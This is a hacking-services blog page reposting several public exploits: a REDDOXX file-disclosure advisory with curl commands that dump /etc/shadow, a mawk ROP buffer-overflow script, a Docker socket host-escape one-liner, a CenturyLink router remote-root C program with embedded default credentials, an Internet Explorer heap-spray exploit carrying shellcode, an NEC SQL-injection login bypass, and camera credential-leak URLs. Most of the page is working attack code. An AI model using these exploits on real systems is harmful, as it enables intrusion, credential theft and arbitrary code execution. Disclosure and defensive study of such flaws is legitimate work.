Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863141464

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance

RedTeam Pentesting discovered an arbitrary file disclosure vulnerability
in the REDDOXX appliance software, which allows unauthenticated
attackers to list directory contents and download arbitrary files from
the affected system with root permissions.

Details
=======

Product: REDDOXX Appliance
Affected Versions: Build 2032 / v2.0.625, older versions likely affected too
Fixed Versions: Version 2032 SP2
Vulnerability Type: Arbitrary File Disclosure
Security Risk: high
Vendor URL: https://www.reddoxx.com/
Vendor Status: patch available
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-006
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"REDDOXX is a leading supplier of solutions for e-mail archiving,
encrypted and digitally signed e-mail traffic as well as spam
protection. Our focus is on technological innovation: taking our cue
from our clientsâ?? requirements our competent and quality-conscious
employees strive to offer you the best possible products at all times.
Using stringent quality standards and proven processes we keep
developing our company and products continuously, with the goal of
continuous improvement."

(from the vendor's homepage)

More Details
============

When using the user frontend of the REDDOXX appliance [0] reachable via
http://www.example.com/rws/user/, HTTP POST requests are used to perform
certain actions. For example, the following request is used to save the
settings of the current user's profile:

------------------------------------------------------------------------

POST /RdxEngine/json HTTP/1.1
Host: www.example.com
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Connection: close

{
"method": "CoreService.SaveUserProfile",
"params": {
"Profile": {
"UseHtmlMail": true,
"DefaultArchiveDisplayPeriode": "5",
"ReportLanguage": "en",
"EnableQueueReport": true
}
},
"id": "{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}"
}
------------------------------------------------------------------------

Through analysis of the .NET binaries pertaining to this endpoint,
extracted from the appliance ISO offered on the vendor's homepage [1],
the methods handling these requests were examined. For the
"SaveUserProfile" method, which is specified through the POST parameter
"method", the code is as follows:

------------------------------------------------------------------------

// Reddoxx.Api.Legacy.CoreServiceService
public void SaveUserProfile(TRoUserProfile Profile)
{
try
{
this.client.OnStartRequest("CoreService", "SaveUserProfile");
this.Service.SaveUserProfile(Profile);
this.client.OnEndRequest("CoreService", "SaveUserProfile");
}
catch (System.Exception e)
{
this.client.HandleException("CoreService", "SaveUserProfile", e);
}
}
------------------------------------------------------------------------

The "TroUserProfile" class contains information about the parameters
that are required for valid requests to this method:

------------------------------------------------------------------------

namespace Reddoxx.Api.Legacy
{
[...]
public class TRoUserProfile : ComplexType
{
private string __ReportLanguage;

private int __DefaultArchiveDisplayPeriode;

private bool __EnableQueueReport;

private bool __UseHtmlMail;

[...]
}
}
------------------------------------------------------------------------

These variable names correspond to the POST parameters contained in the
request that was created when the profile was saved. With this knowledge
about how methods are called and parameters are passed, it was attempted
to call other methods from different packages. It was determined that it
is possible to access certain methods which allow reading arbitrary
files and directory listings.

It was later discovered that the process handling requests to the
vulnerable methods runs with root privileges.

Proof of Concept
================

At least two methods are found to be of interest for attackers:
FileTransfer.GetDirectoryList, which returns a directory listing for a
path specified via a parameter, and FileTransfer.DownloadFile, which
returns the file specified via a parameter in Base64-encoded form. The
following curl command-lines can be used to call the respective methods:

------------------------------------------------------------------------

$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer
.GetDirectoryList","params":{"Directory": "/etc/"}}' 'http://www.example.com/RdxEngine/json' | jq '.result.FileInfoList[].FileName'
"chatscripts"
"gtk-2.0"
"xen"
"dbus-1"
"request-key.d"
"smartmontools"
"console"
"skel"
"xml"
"initramfs-tools"
"sysctl.d"
"pear"
"sudoers.d"
"cron.monthly"
"rc5.d"
"init"
"byobu"
"pki"
"xpdf"
"cron.weekly"
"snmp"
"ld.so.conf.d"
[...]
------------------------------------------------------------------------

Since the process handling the requests runs with root privileges, it
was also possible to read the contents of the file "/etc/passwd":

------------------------------------------------------------------------

$ curl --silent --data-binary '{"id":"{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}",''"method":"FileTransfer
.DownloadFile","params":{"FileName": "/etc/shadow",''"Sequence": 1,"ChunkSize": 10000}}' 'http://www.example.com/RdxEngine/json' | jq -r .result.ChunkData | tr -d '\r\n' | base64 -d
root:$6$XXXXXXXX$YYYYYYY[...]YYYYYYYY:14993:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16899:0:99999:7:::
sshd:*:16899:0:99999:7:::
vboxadd:!:16899::::::
statd:*:16899:0:99999:7:::
admin:$1$XXXXXXXX$ZZZZZZZZZZZZZZZZZZZZZZ:14054:0:99999:7:::
clamav:!:16899:0:99999:7:::
ntp:*:16899:0:99999:7:::
hacluster:!:16899:0:99999:7:::
firebird:*:16899:0:99999:7:::
redis:!:16899:0:99999:7:::
snmp:*:16899:0:99999:7:::
bind:*:16899:0:99999:7:::
smbadmin:!:17037:0:99999:7:::
smbuser:!:17037:0:99999:7:::
------------------------------------------------------------------------

Workaround
==========

None

Fix
===

Update the appliance software to Version 2032 SP2.

Security Risk
=============

Attackers with access to a REDDOXX appliance are able to retrieve
directory listings and content of arbitrary files. Although this
vulnerability requires attackers to submit a valid session ID, the
vulnerabilities described in rt-sa-2017-004 [2] and rt-sa-2017-005 [3]
show how this requirement can be fulfilled even by attackers without
valid credentials. Additionally, the RdxEngine process handling the
requests to the vulnerable methods runs with root privileges, allowing
attackers to read any file on the filesystem and, for example, extract
the local user hashes for offline brute-force attacks. This
vulnerability is therefore rated as a high risk.

Timeline
========

2017-05-17 Vulnerability identified
2017-05-23 Customer approved disclosure of vulnerability
2017-05-26 Customer provided details of vulnerability to vendor
2017-07-20 Vulnerability reported as fixed by vendor
2017-07-24 Advisory released

References
==========

[0] https://www.reddoxx.com/en/
[1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads
(Requires login)
[2] https://www.redteam-pentesting.de/advisories/rt-sa-2017-004
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2017-005

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
HireHackking 
#!/usr/bin/python
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
#
# Program affected: mawk is an interpreter for the AWK Programming Language. The AWK language is useful
# for manipulation of data files, text retrieval and processing, and for prototyping and experimenting with algorithms.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
import os, subprocess
from struct import pack

 ropchain = "A"*1038 # junk
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe0) # @ .data
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0807b744) # pop eax ; ret
 ropchain += '/bin'
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe4) # @ .data + 4
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0807b744) # pop eax ; ret
 ropchain += '//sh'
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
 ropchain += pack('<I', 0x0811abe0) # @ .data
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x08067b43) # pop ecx ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080c861f) # int 0x80

  try:
         print("[*] MAWK 1.3.3 Stack-Based Buffer Overflow by Juan Sacco")
            print("[*] Please wait.. running")
               subprocess.call(["jad", ropchain])
  except OSError as e:
         if e.errno == os.errno.ENOENT:
                    print "MAWK  not found!"
                       else:
                               print "Error executing exploit"
                                  raise
HireHackking 
# Exploit Title: Docker Daemon - Unprotected TCP Socket
# Date: 20-07-2017
# Exploit Author: Martin Pizala
# Vendor Homepage: https://www.docker.com
# Software Link: https://www.docker.com/get-docker
# Version: Since 0.4.7 (2013-06-28) (feature: mount host directories)
# Tested on: Docker CE 17.06.0-ce and Docker Engine 1.13.1
 
1. Description

Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail.

2. Proof of Concept

docker -H tcp://<ip>:<port> run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh

3. Solution:

Protect the tcp socket
https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket
https://docs.docker.com/engine/security/https/
HireHackking 
/*  PK5001Z CenturyLink Router/Modem remote root exploit                  */
/*             oxagast / Marshall Whittaker                               */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin                     */
/* PK5001Z CenturyLink Router remote root 0day                            */
/* Enjoy!                                                                 */
/*   --oxagast                                                            */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1         */
/*                                                                        */
/* # uname -a; id;                                                        */
/* Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown  */
/* uid=0(root) gid=0(root)                                                */
/* #                                                                      */
/*                                                                        */

#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#include <signal.h>

#define END_STRING "chau\n"
#define COMPLETE_STRING "fin-respuesta"

#ifndef MSG_NOSIGNAL
#define MSG_NOSIGNAL SO_NOSIGPIPE
#endif

#define perro(x)                                                               \
  {                                                                            \
    fprintf(stderr, "%s:%d: %s: %s\n", __FILE__, __LINE__, x,                  \
            strerror(errno));                                                  \
    exit(1);                                                                   \
  }

void send_root(int sock, int pid) {
  char buf[1024] = {0};
  char getal[1024] = "\x61\x64\x6d\x69\x6e\x0a";
  char getap[1024] = "\x43\x65\x6e\x74\x75\x72\x79\x4c\x31\x6e\x6b\x0a";
  char getrl[1024] = "\x73\x75\x20\x72\x6f\x6f\x74\x0a";
  char getrp[1024] = "\x7a\x79\x61\x64\x35\x30\x30\x31";
  recv(sock, buf, 1024 - 1, 0);
  sleep(1);
  if (strncmp(getal, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getal, strlen(getal) + 1, 0) < 0)
    perro("send");
  recv(sock, buf, 1024 - 1, 0);
  sleep(1);
  if (strncmp(getap, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getap, strlen(getap) + 1, 0) < 0)
    perro("send");
  sleep(2);
  recv(sock, buf, 1024 - 1, 0);
  if (strncmp(getrl, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getrl, strlen(getrl) + 1, 0) < 0)
    perro("send");
  sleep(2);
  recv(sock, buf, 1024 - 1, 0);
  if (strncmp(getrp, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, getrp, strlen(getrp) + 1, 0) < 0)
    perro("send");
  sleep(2);
}

void send_cmd(int sock, int pid) {
  char str[1024] = {0};

  while (fgets(str, 1024, stdin) == str) {
    if (strncmp(str, END_STRING, strlen(END_STRING)) == 0)
      break;
    if (send(sock, str, strlen(str) + 1, 0) < 0)
      perro("send");
  }
  kill(pid, SIGKILL);
}

void sys_info(int sock, int pid) {
  char buf[1024] = {0};
  char sysinfo[1024] = "\nuname -a; id;\n";
  if (strncmp(sysinfo, END_STRING, strlen(END_STRING)) == 0)
    ;
  if (send(sock, sysinfo, strlen(sysinfo) + 1, 0) < 0)
    perro("send");
  sleep(1);
  int filled = 0;
  while (filled = recv(sock, buf, 1024 - 1, 0)) {
    buf[filled] = '\0';
    printf("%s", buf);
    fflush(stdout);
  }
  kill(pid, SIGKILL);
}

void receive(int sock) {
  char buf[1024] = {0};
  int filled = 0;
  while (filled = recv(sock, buf, 1024 - 1, 0)) {
    buf[filled] = '\0';
    printf("%s", buf);
    fflush(stdout);
  }
}

int main(int argc, char **argv) {
  if (argc != 2) {
    printf("PK5001Z CenturyLink Router remote root 0day\nEnjoy!\n");
    printf("   --oxagast\n");
    exit(1);
  }
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  if (sock == -1)
    perro("socket");
  struct in_addr server_addr;
  if (!inet_aton(argv[1], &server_addr))
    perro("inet_aton");
  struct sockaddr_in connection;
  connection.sin_family = AF_INET;
  memcpy(&connection.sin_addr, &server_addr, sizeof(server_addr));
  connection.sin_port = htons(23);
  if (connect(sock, (const struct sockaddr *)&connection, sizeof(connection)) !=
      0)
    perro("connect");
  sleep(1);
  int pid_root, pid_sys, pid_shell;
  sleep(1);
  send_root(sock, pid_root);
  if (pid_shell = fork())
    sys_info(sock, pid_sys);
  if (pid_shell = fork())
    send_cmd(sock, pid_shell);
  else
    receive(sock);
  return (0);
}
HireHackking 
<!DOCTYPE html>
<html>
<head>
    <style>
        .class1 { float: left; column-count: 5; }
        .class2 { column-span: all; columns: 1px; }
        table {border-spacing: 0px;}
    </style>
    <script>
 
    var base_leaked_addr = "";
 
    function infoleak() {
     
        var textarea = document.getElementById("textarea");
        var frame = document.createElement("iframe");
      
        textarea.appendChild(frame);
        frame.contentDocument.onreadystatechange = eventhandler;
 
        form.reset();
         
    }
      
    function eventhandler() {
     
        document.getElementById("textarea").defaultValue = "foo";
        // Object replaced here
        // one of the side allocations of the audio element
        var audioElm = document.createElement("audio");
            audioElm.src = "test.mp3";
                 
    }
     
    function writeu(base, offs) {
     
        var res = 0;
        if (base != 0) {  res = base + offs }
        else {  res = offs }
        res = res.toString(16);
        while (res.length < 8) res = "0"+res;
        return "%u"+res.substring(4,8)+"%u"+res.substring(0,4);
         
    }
     
    function readu(value) {
                 
        var uc = escape(value);
        var ucsplit = uc.split('%');
        var res = parseInt('0x' + ucsplit[2].replace('u', '') + ucsplit[1].replace('u', ''));
        return res;
         
    }
         
    function spray() {
     
        // DEPS technique used here - avoid null bytes
 
        var hso = document.createElement("div");
        base_leaked_addr = parseInt(base_leaked_addr,16);
 
        var junk = unescape("%u0e0e%u0e0e");
        while (junk.length < 0x1000) junk += junk;
 
 
        var rop = unescape(
            writeu(base_leaked_addr,0x56341) + 
            writeu(base_leaked_addr,0x56341) + 
            writeu(base_leaked_addr,0x9b7c) + 
            writeu(0,0xffffffff) + 
            writeu(base_leaked_addr,0x2a89e) + 
            writeu(0,0x41414141) + 
            writeu(base_leaked_addr,0x4e385) + 
            writeu(0,0x41414141) + 
            writeu(base_leaked_addr,0x2030f) + 
            writeu(base_leaked_addr,0x9b7c) + 
            writeu(0,0x41414141) + 
            writeu(0,0x41414141) + 
            writeu(0,0xf07645d5) + 
            writeu(base_leaked_addr,0x6e002) + 
            writeu(0,0x41414141) + 
            writeu(base_leaked_addr,0xaebc) + 
            writeu(base_leaked_addr,0x9b7c) + 
            writeu(0,0xffffffbf) + 
            writeu(base_leaked_addr,0x2a89e) + 
            writeu(0,0x41414141) + 
            writeu(base_leaked_addr,0x6361b) + 
            writeu(base_leaked_addr,0x432cf) + 
            writeu(0,0x41414141) + 
            writeu(0,0x41414141) + 
            writeu(base_leaked_addr,0x9b7c) + 
            writeu(base_leaked_addr,0x5cef1) + 
            writeu(base_leaked_addr,0x4177e) + 
            writeu(base_leaked_addr,0x9b7c) + 
            writeu(base_leaked_addr,0x1244) + 
            writeu(base_leaked_addr,0xa819) + 
            writeu(0,0x41414141) + 
            writeu(base_leaked_addr,0x2720b) + 
            "" );
 
        /*
         
        Original VirtualAlloc ROP generated with mona.py - www.corelan.be
        Library used "propsys.dll", part of the Windows Search functionality (?)
        and last updated Nov 2010. I think it's a good target for our needs.
        Fixed to overcome the problem with MOV EAX,80004001 after the PUSHAD instruction
         
        "%u6341%u6af8" + // 0x6af86341 : ,# POP EBP # RETN [PROPSYS.dll] 
        "%u6341%u6af8" + // 0x6af86341 : ,# skip 4 bytes [PROPSYS.dll]
        "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] 
        "%uffff%uffff" + // 0xffffffff : ,# Value to negate, will become 0x00000001
        "%ua89e%u6af5" + // 0x6af5a89e : ,# NEG EAX # RETN [PROPSYS.dll] 
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%ue385%u6af7" + // 0x6af7e385 : ,# PUSH EAX # ADD AL,5E # XOR EAX,EAX # POP EBX # POP EDI # POP EBP # RETN 0x08 [PROPSYS.dll] 
        "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
        "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate) --> changed to 0x6af5030f :  # POP EBX # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
        "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] 
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%u45d5%uf076" + // 0xf07645d5 : ,# put delta into eax (-> put 0x00001000 into edx)
        "%ue002%u6af9" + // 0x6af9e002 : ,# ADD EAX,0F89CA2B # RETN [PROPSYS.dll] 
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%uaebc%u6af3" + // 0x6af3aebc : ,# XCHG EAX,EDX # RETN [PROPSYS.dll] 
        "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] 
        "%uffc0%uffff" + // 0xffffffc0 : ,# Value to negate, will become 0x00000040
        "%ua89e%u6af5" + // 0x6af5a89e : ,# NEG EAX # RETN [PROPSYS.dll] 
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%u361b%u6af9" + // 0x6af9361b : ,# XCHG EAX,ECX # ADD DL,B # DEC ECX # RETN 0x08 [PROPSYS.dll] 
        "%u32cf%u6af7" + // 0x6af732cf : ,# POP EDI # RETN [PROPSYS.dll] 
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
        "%u40bd%u6af4" + // 0x6af440bd : ,# RETN (ROP NOP) [PROPSYS.dll] 
        "%ucef1%u6af8" + // 0x6af8cef1 : ,# POP ESI # RETN [PROPSYS.dll] 
        "%u177e%u6af7" + // 0x6af7177e : ,# JMP [EAX] [PROPSYS.dll]
        "%u9b7c%u6af3" + // 0x6af39b7c : ,# POP EAX # RETN 0x04 [PROPSYS.dll] 
        "%u1244%u6af3" + // 0x6af31244 : ,# ptr to &VirtualAlloc() [IAT PROPSYS.dll]
        "%u6af8" + // 0x6af80a14 : ,# PUSHAD # ADD AL,0 # MOV EAX,80004001 # POP EBP # RETN 0x08 [PROPSYS.dll]  --> changed to  0x6af3a819 :  # PUSHAD # CMP EAX,0C68B6AF3 # POP ESI # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
        "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation) 
        "%u720b%u6af5" + // 0x6af5720b : ,# ptr to 'jmp esp' [PROPSYS.dll]
         
        */
         
         
         
        // Move ESP to the VirtualAlloc ROP chain
        var stack_shift_rop = unescape(
            writeu(0,235802130) +
            writeu(base_leaked_addr,0x2030f) + // 0x6af5030f :  # POP EBX # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x0e0e1258) +
            writeu(base_leaked_addr,0x28002) +  // 0x6af58002 :  # MOV EAX,EBX # POP EBX # POP EBP # RETN 0x08    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x0b473) + //0x6af3b473 :  # XCHG EAX,ESP # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x41414141) + 
            writeu(0,0x41414141) +
            "");
         
         
         
 
        // root@kali:~# msfvenom  -p windows/exec cmd=calc.exe -b "\x00" -f js_le
        // ~2854 bytes max
         
        var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption
                "%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" +
        "");
     
         
        var xchg = unescape(writeu(base_leaked_addr, 0x0b473));  // Initial EIP control ---> 0x6af3b473 :  # XCHG EAX,ESP # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
        var fix1 = 0x15c; 
        var fixop = unescape("%u0e0e%u0e0e");
        var offset_to_stack_shift = 0x6f7;
        var offset_to_xchg = 0xd2+2;
        // Jumping a bit around here, pretty sure this can be simplified but hey... it works
        data = junk.substring(0,fix1-rop.length) + rop + fixop + shellcode + junk.substring(0,offset_to_stack_shift-fix1-fixop.length-shellcode.length) + stack_shift_rop + junk.substring(0,offset_to_xchg-stack_shift_rop.length) + xchg;
        data += junk.substring(0,0x800-offset_to_stack_shift-offset_to_xchg-xchg.length);
     
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x350; i++) 
        {
            var obj = document.createElement("button");
            obj.title = data.substring(0,(0x7fb00-2)/2); 
            hso.appendChild(obj);
        }
    }
 
    function boom() {
        document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
        th1.align = "right";
    }
     
    setTimeout(function() {
 
        var txt = document.getElementById("textarea");
        var il = txt.value.substring(0,2);
        var leaked_addr = readu(il);
        base_leaked_addr = leaked_addr - 0xbacc; // base of propsys
        base_leaked_addr = base_leaked_addr.toString(16);
        spray();
        boom();
         
    }, 1000); // can be reduced
    </script>
</head>
 
<body onload=infoleak()>
    <form id="form">
        <textarea id="textarea" style="display:none" cols="81">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</textarea>
    </form>
<script>
 
</script>
    <table cellspacing="0">
        <tr class="class1">
        <th id="th1" colspan="0" width=2000000></th>
        <th class="class2" width=0><div class="class2"></div></th>
    </table>
</body>
</html>
HireHackking 
# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection
# Vulnerbility: SQL injection login bypass
# Date: 15-12-2016
# Exploit Author: b0x41s
# Author web: https://www.xrayit.nl
# Vendor Homepage: https://www.nec-enterprise.com
# Category: webapps
# Version: 11.6.0.31
# Tested on: Windows server 2008

Description:
The auth_user parameter is vulnerable to SQL injection.
The login can be bypassed.

POC:
POST /admin/index.php HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://127.0.0.1/admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Lenght: 105
Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en
submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de

Fix answer from vendor:
The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.
HireHackking 
# Exploit Title: IP Camera VACRON VIG-US731VE
# Date: 2017-07-18
# Exploit Author: anonymous
# Vendor Homepage: www.vacron.com
# Version: V1.0.18-09-B727

1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd


there is newer firmware available from the vendor, but I haven't tested on that one.
HireHackking 
# Exploit Title: Virtual Postage (VPA) - Remote Code Execution via MITM
# Date: 20/Jul/17
# Exploit Author: MaXe
# Vendor Homepage: https://play.google.com/store/apps/details?id=a2.virtualpostage.com [http://archive.is/EdtJT]
# Software Link: N/A
# Screenshot: N/A
# Version: 1.0
# Tested on: Android 4.1.0 (Google APIs) - API Level 16 - x86
# CVE : N/A

 Virtual Postage (VPA) - Remote Code Execution via MITM

Version affected: 1.0

App Info: The Android application reviewed allows a user to calculate how much postage will cost.

External Links: 
https://play.google.com/store/apps/details?id=a2.virtualpostage.com [http://archive.is/EdtJT]


Credits: MaXe (@InterN0T) 

Special Thanks: Geoff Ellis for also identifying credentials being sent over HTTP GET requests before InterN0T did: 
https://www.linkedin.com/pulse/insecure-mobile-application-programming-practices-case-geoff-ellis [http://archive.is/LvSeb]
